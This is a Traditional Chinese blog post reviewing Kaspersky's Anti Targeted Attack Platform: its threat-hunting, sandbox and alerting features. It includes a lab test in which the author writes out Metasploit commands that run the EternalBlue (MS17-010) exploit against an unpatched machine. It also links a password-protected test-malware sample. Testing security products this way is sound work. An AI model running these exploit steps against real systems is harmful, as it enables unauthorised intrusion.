《企業端點完美防禦》22-綜觀全局：卡巴斯基反針對攻擊平台

現在的網路世界，駭客隨時想盡各種辦法入侵任何類型的企業，有些攻擊潛伏很久、並且難以偵測；有些只是針對特定產業、特定組織進行，除此之外也有一次性的攻擊。這些攻擊使用零日漏洞、釣魚郵件、社交工程等方式想盡辦法進入企業，傷害度不亞於國家發動的持續進階威脅。暗網可以輕易購買到一個人的個人資料、公司登入帳密與憑證，人為的疏失讓傳統端點防護失效，甚至看個廣告都可以讓駭客潛伏於企業當中。

威脅金字塔，來源：https://www.securnite.com/index.php/2018/11/03/the-threat-pyramid-scheme/

卡巴斯基知道所有的攻擊手法，接露許多持續進階威脅，如：與美國國安局有關的方程式組織、與俄羅斯聯邦安全局有關的Turla、與北韓有關的Kimsuky。但卡巴斯基可以阻擋全世界所有的攻擊嗎？不能，因為攻擊太多了，在偵測到以前，針對公司的攻擊可能已經入侵並開始破壞，使用擴展式偵測與回應解決方案，才能讓系統管理員第一時間發現針對式攻擊並加以阻擋。這篇將介紹使用卡巴斯基反針對攻擊平台看到公司的全貌，並進行威脅獵捕。(點擊查看TADVISER對KATA的介紹)

卡巴斯基反針對攻擊平台(Kaspersky Anti Targeted Attack Platform, KATA)是卡巴斯基自己使用的平台，可將他們的威脅情資轉化為工具提供客戶抵禦各式各樣的攻擊

單一KATA架構，參考：https://support.kaspersky.com/help/KATA/6.1/en-US/247193.htm

分散式KATA架構，參考：https://support.kaspersky.com/help/KATA/6.1/en-US/247193.htm

KATA平台搭配EDR專家版一起購買後，有以下工具，可以協助系統管理員發現威脅：

防毒引擎(Anti-Malware Engine)：同卡巴斯基端點防護的防毒功能，掃描檔案是否有病毒以及對企業基礎架構的威脅。
手機攻擊分析器(Mobile Attack Analyzer, MAA)。使用機器學習技術、與KSN掃描APK檔。掃描結果會回傳至KATA。
YARA：系統管理員可於KATA建立YARA來掃描檔案和對象，以搜尋對企業進行針對性攻擊的跡象。
目標攻擊分析器(Targeted Attack Analyzer, TAA)：這是KATA中IOA分析的工具，可監控公司內網網路活動，並偵測需留意的網路活動，以及針對企業基礎架構的針對式攻擊。如果這個引擎掃描到威脅，代表駭客已經入侵公司，需盡快找出受感染裝置、與攻擊來源進行處理。
KSN：KATA可以連接KSN，針對最新威脅快速反應。
若有購買沙箱，會多一個Sandbox分析結果，可從下面Storage功能看到。

今年有幸藉由禾滔科技的協助，進行KATA產品評估，KATA是一個非常全面的分析平台，需要對網路、AD架構、與藍隊工具有一定的了解才能駕馭，建議公司需要有專業的SOC team再進行添購，或搭配卡巴斯基託管式偵測與回應方案，藉由卡巴斯基專家監控從KATA收集到的遙測資料，補足公司資安人力缺口。

駕馭KATA建議具備技能：

接下來圖文部份請搭配官方文件使用：

Kaspersky Anti Targeted Attack Platform Help

下面就是平台安裝好後的登入頁面，可以看到有個Local administrator的框框，打勾後可以進到KATA後台進行系統微調，不勾則可進入KATA前台進行威脅獵捕。

登入後進入主畫面，這個面板可以看到企業內部哪些攻擊正在發生，並清楚表明嚴重等級、被什麼工具偵測。在這個案例我架了一台Kali Linux針對靶機進行攻擊，所以能看到威脅統計，第二張圖可看到觸發了TAA引擎偵測。

警告頁面可以看到受攻擊主機觸發了什麼偵測規則，點進去後會有事件編號，再點選Scan results後可以知道觸發的掃描規則代表什麼意思，這邊的解釋對應MITRE ATT&CK，並說明緩解政策與誤報排除。

在上面這個案例中，發現了靶機遭受攻擊，我們就得對這台主機進行分析，看看發生了什麼事。進到Threat Hunting頁面，找出這台主機看log檔，這就是苦命藍隊日常 ¯\_(ツ)_/¯。

由於會收集端點上所有資料，一天正常的主機約有20,000筆log檔，所以架設KATA需要非常龐大的容量

可從Event中針對每個檔案的SHA256、和MD5進行過濾規則、尋找與之關聯的事件、調用卡巴斯基威脅情資平台、Virustotal、建立防禦規則。請留意不要把正常程序加入「Create prevention rule」，嚴重的話公司就會遭受如CrowdStrike藍屏一樣的慘況。

MD5無法調用Virustotal，未來也會漸漸被淘汰，但目前還是一個常見的查詢方式

Tasks可以排程掃描工作、以及從端點提取檔案，包含記憶體傾印檔案。

來測試如何抓取靶機的傾印檔案，點選Get data⮕Memory dump，儲存位置必須是網路資料夾，輸入資料夾帳密後就可以去閒晃，等一陣子後再把檔案拿來分析。

其他的功能給各位快速看一眼。

Prevention可以阻止特定檔案啟動，不要設定到系統啟動檔，否則藍屏死機就有你的份。

如果有購買卡巴斯基沙箱方案，當KATA接收到沙箱分析後的檔案並判定為中等風險、與高風險時，可以開啟自動阻止這類型檔案執行功能，適合缺少SOC team並完全相信卡巴斯基分析結果的人使用。

客製化規則區可以讓管理員匯入自己寫的TAA、IDS、IOC，YARA、Sandbox規則。IDS規則需要特別注意，匯入後在幾台測試電腦上執行，避免拖慢效能。

沙箱可以建立檔案偵測規則、以及網址偵測規則。

Storage可以看到存放在KATA上的檔案，這裡上傳的檔案會經由防毒引擎(AM)、沙箱(SB)、YARA三種模式掃描，判定檔案是否為惡意檔案；如果還是不放心，可以將檔案寄送到Opentip，如果還是沒有結果，可以按下Submit to reanalyze，就會交由卡巴斯基分析人員分析。

分析完成後，如果不放心可以連線到TIP(Threat Intelligence Portal)、或Virustotal查看。請留意TIP需要花費購買，而Opentip是免費服務，關於TIP的訊息請洽經銷商

點選上一張圖中的Sandbox detection後，可以看到地端沙箱分析的結果，預設模擬在Win7、Win8、CentOS這三個系統

如果要更加詳細分析沙箱內容，點選Download full log後進行log分析

上傳Opentip後還是不放心，按下Submit to reanalyze給俄羅斯人瞧瞧

如果有買MDR服務，並用卡巴斯基帳號登入，分析師會回信到註冊信箱；個人版或沒有購買MDR已經不會收到回信了

Endpoint Agents可以確認代理程式(其他廠商可能會將之稱為偵測器，Sensor，同樣的意思)與KATA連接的狀況，除了電腦上的代理程式外，也包含Kaspersky Security for Mail Server、與Kaspersky Security for Internet Gateway等連接。

Reports是建立報告的地方，和WordPress類似，與KSC的報告不同，可以完全客製化報告。

主要功能講完了，接下來講一點系統設定，系統設定必需根據公司情況設定，因此請靈活運用。

可以讓端點上的代理程式做下列事情：IoC排程掃描、自動發送可疑檔案到地端沙箱、以及IoA掃描

KPSN是卡巴斯基另一個產品，因為KSN會自動上傳遙測資料到世界各地的資料中心進行分析，如果不想上傳，必需架設KPSN，使用KPSN的端點只會使用KSN的資料庫，而不會往KSN傳送資料

Notifications功能可設定觸發哪些掃描功能掃到惡意程式時通知系統管理員

VIP status我稱它重點關照對象，可以根據IP、主機名稱、Email設定通知

在卡巴斯基企業版中，可以排除防毒軟體掃描特定檔案與資料夾，但在KATA裡能排除的項目更多，從MD5、IP、YARA等都可以設定。

如果有添購沙箱，在Sandbox servers可以進行串接。

沙箱預先可以模擬Win7、Win10、與CentOS，如果點選Custom，需要在後台上傳作業系統檔案，等前台講完再來講後台

Passwords for archives可以預先設定常用密碼，當卡巴斯基掃描時遇到加密壓縮檔，會先用這些密碼進行解密。

License可以看到KATA、EDR的授權數量，與剩餘天數。

開頭說到，在大型企業內可能會有多台KATA，管理員可在主要的KATA伺服器中查看Sensor servers功能，並下載網路流量。

當系統設定完成後，怎麼知道這套系統是好是壞？如果公司究極有錢，可以在產品測試階段，請DEVCORE 戴夫寇爾或卡巴斯基滲透測試打一頓，有關這兩家的紅隊演練服務，可參考我在2024資安大會所寫的文章：參加藍隊論壇後的CYBERSEC 2024 臺灣資安大會感想。太窮無法買這些服務怎麼辦？我們可以自架Kali Linux攻擊受測電腦，下面就來示範以Kali Linux中的工具Metasploit攻擊測試用電腦。注意：Kali Linux內的駭客工具僅可用來作為測試公司安全架構使用，若拿來破壞他人電腦將觸犯刑法第36章妨害電腦使用罪，本人不負責任何人、任何組織因觀看本文章後所進行的破壞責任。

為了能攻擊成功，靶機不安裝任何更新，關閉KES的即時防護、防火牆、與網路攻擊防護，確認Endpoint Detection and Response(KATA)有開啟(這裡我忘記把MDR關掉，結果入侵後收到MDR警告XD)，並開啟Metasploit，這裡我們用永恆之藍當範例。

使用下列命令找出自己電腦的IP

ip a

搜尋永恆之藍漏洞

msf6 > search eternal

使用SMB漏洞MS17-010掃描器

msf6 > use auxiliary/scanner/smb/smb_ms17_010

設定攻擊目標IP

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS XXX.XXX.XXX.XXX

使用SMB漏洞中的永恆之藍模組

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

設定靶機IP與自己的IP

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS XXX.XXX.XXX.XXX

msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST XXX.XXX.XXX.XXX

設定完成後，執行漏洞

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

執行完上面的步驟後，過幾分鐘KATA就會跳出警告訊息，由於是在內部網路使用這個漏洞，如同駭客已經滲透企業內部，所以觸發的是TAA警告，這時我們就可以隔離主機、加入排除、設定阻擋規則。

點選Scan results後，可以看到IOA對應的MITRE ATT&CK，以及緩解建議、誤報排除

如果確定是誤報，可以選擇永久排除、或是在某些情況下排除。如果你是一個駭客、且取得KATA權限，可以完全排除A__A

點選All events related to the alert，會跳轉到Threat Hunting頁面，並用IOA的方式尋找相關的警告

這個畫面是卡巴斯基EDR Expert的畫面，由於是執行攻擊指令，並沒有惡意程式產生，所以MD5欄位並沒有顯示任何資料

我們也可以下載測試用的惡意程式並執行，看看KATA有什麼結果，這邊要利用卡巴斯基測試EDR Optimum的檔案：https://kas.pr/edro_sample，密碼：infected。

Virustotal大家都熟，我們就來看看要付費的TIP，裡面每個小模組都要付費才能解鎖

以上展示了如何利用KATA進行威脅獵捕，但測試奇觀我忘記關MDR，所以收到卡巴斯基發來的提醒XD

太尷尬了，傳個鬼臉給俄羅斯人好了，不然隔著螢幕都能感受到他們的怒火。

憤怒的俄羅斯人，幸好我玩過CS;GO，我知道他說cyka blyat和idi nahui

從這個攻擊可以看到，如果沒有修補漏洞，當駭客使用Metasploit掃描時，雖然端點防護有機會可以擋下攻擊，但是修補漏洞才能把威脅的根本因解決掉。

雖然這個產品已經有企業導入，但網路上找不到中文、或英文版相關的使用心得文，所以決定記錄下來，一般人很難有機會摸到XDR產品，隨便動輒幾百萬不是每個企業有辦法支出。

這款產品參加過APT29的ATT&CK Evaluations，成績屬於中下(而且是在有MSSP服務的結果)，之後就沒有再參加該測試。卡巴斯基官方有自己的解釋，詳見：MITRE ATT&CK Evaluation for Kaspersky。還是要強調所有的測試只能拿來參考，並不能拿來判斷一款產品的好壞，會這樣說是因為為了讓測試順利執行，很多功能必需關閉，在真實世界將這些功能關掉電腦早就被入侵了，裝什麼都沒用，詳見：KASPERSKY CONFIGURATION